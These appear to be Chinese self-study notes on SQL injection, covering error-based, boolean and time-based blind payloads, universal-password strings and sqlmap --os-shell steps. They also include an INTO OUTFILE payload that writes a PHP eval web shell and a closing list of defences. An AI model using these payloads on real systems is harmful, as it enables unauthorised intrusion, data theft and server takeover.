自学sql注入(三)
这是笔者自行整理出来的有关sql注入的一些知识点,自己还有些迷迷糊糊,可能有些不对的地方。等学完之后,再来详写一系列的关于sql注入的文章
基于floor的报错注入:
1' and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)#基于boolean的盲注
Boolean是基于真假的判断(true or false);
不管输入什么,结果都只返回真或假两种情况;
Boolean型盲注的关键在于通过表达式结果与已知值进行比对,根据比对结果判断正确与否
Boolean型盲注的判断方式有
通过长度判断length():
select length(database())>=x通过字符判断substr():
select substr(database(),1,1) =‘s’通过ascII码判断:ascii():
select ascii(substr(database(),1,1)) =x基于时间的盲注:
页面不返回任何信息
通过时间回显的延迟作为判断。
利用sleep()或benchmark()函数延长mysql的执行时间;
与if()搭配使用
时间型盲注
payload:if(expr1,expr2,expr3)语义解析:
对expr1进行布尔判断,如果为真,则执行expr2,如果为假,则执行expr3
常用payload:
if(length(database())>1,sleep(5),1)
如果数据库名字符长度大于1为真,则mysql休眠5秒,否则查询1
盲注常用函数
left(m,n) --从左向右截取字符串m返回其前n位
substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串
ascii(m) --返回字符m的ASCII码
if(str1,str2,str3)–如果str1正确就执行str2,否则执行str3
sleep(m)–使程序暂停m秒
length(m) --返回字符串m的长度
count(column_name) --返回指定列的值的数目
sql注入文件读写
利用sql进行读写需要一个非常重要的前置条件:secure_file_priv
在数据库中输入show global variables like ‘%secure%’命令查看secure_file_priv的值。
secure_file_priv=null,不能进行写入导出;
secure_file_priv=空(什么都没有),可以进行写入导出;
secure_file_priv=/tmp/,写入导出只能在/tmp/进行。
该配置可以在my.cnf中进行修改。
读取:Select load_file(‘c:/wamp/www/flag.txt’);读取文件,必须知道绝对路径
写入:1’ union select 1,2,“?php@eval($\_GET[‘test’]);?” into outfile‘c:/wamp/www/test1.php’ %23
使用sqlmap控制服务器的方法:
1、正常找到注入点;
2、输入–current-user,获得当前用户信息;
3、输入–is-dba,查看是否为数据库管理员,返回TRUE时代表是管理员
4、输入–os-shell,尝试获得系统权限,选择正确的服务器语言以及上传路径
万能密码
本质上是基于sql注入的永真条件来实现万能密码登录
1 or 1=1
1’ or 1=1#
post的注入
常见于登录面板
使用burpsuite抓包到repeater进行手工注入
将注入请求的数据包保存到一个txt文档例如sql.txt,然后在sqlmap中使用sqlmap.py -r "sql.txt"来进行注入
sql注入的防护
1、对输入严格过滤和转义
使用addslashes,mysqli_real_escape_string对字符进行过滤或转义,本质基于黑名单,存在绕过可能性;
2、预编译和参数化(推荐)
使用pdo的prepare对输入进行预处理;
3、部署waf(硬件waf,安全狗)
存在绕过可能性
4、云端防护(360网站卫士,阿里云盾)
通过dns将用户输入先解析到云防护上,确认安全再请求目标服务器